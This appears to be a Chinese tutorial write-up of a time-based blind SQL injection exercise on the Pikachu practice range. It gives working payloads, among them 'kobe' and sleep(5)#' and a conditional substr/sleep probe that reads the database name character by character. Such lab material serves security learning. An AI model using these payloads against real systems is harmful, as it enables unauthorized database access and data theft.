SQL注入---基于时间盲注

SQL注入—基于时间盲注

实验平台:
皮卡丘靶场—盲注(base on time)

实验原理:

  1. 输入单引号’,确定此处没有报错信息:
    SQL注入---基于时间盲注_第1张图片

  2. 输入payload:kobe’ and 1=1#,发现也没有报错信息
    在这里插入图片描述

  3. 在浏览器后台—网络中查看payload执行时间:kobe’ and sleep(5)#
    在这里插入图片描述
    此处执行了sleep(5),执行时间用了5000ms。因此此处存在SQL注入,并且是基于时间的盲注。

  4. 基于时间的延迟的payload:kobe’ and if((substr(database(),1,1))=‘a’, sleep(5), null)#
    数据库名称的第一个字符如果为’a’,就会暂停5s,否则正常执行。
    该payload没有使页面暂停5s,输入kobe’ and if((substr(database(),1,1))=‘p’, sleep(5), null)#
    在这里插入图片描述
    因此可判断,数据库名第一个字符为’p’,以此类推

你可能感兴趣的:(web,安全,mysql,sql,数据库)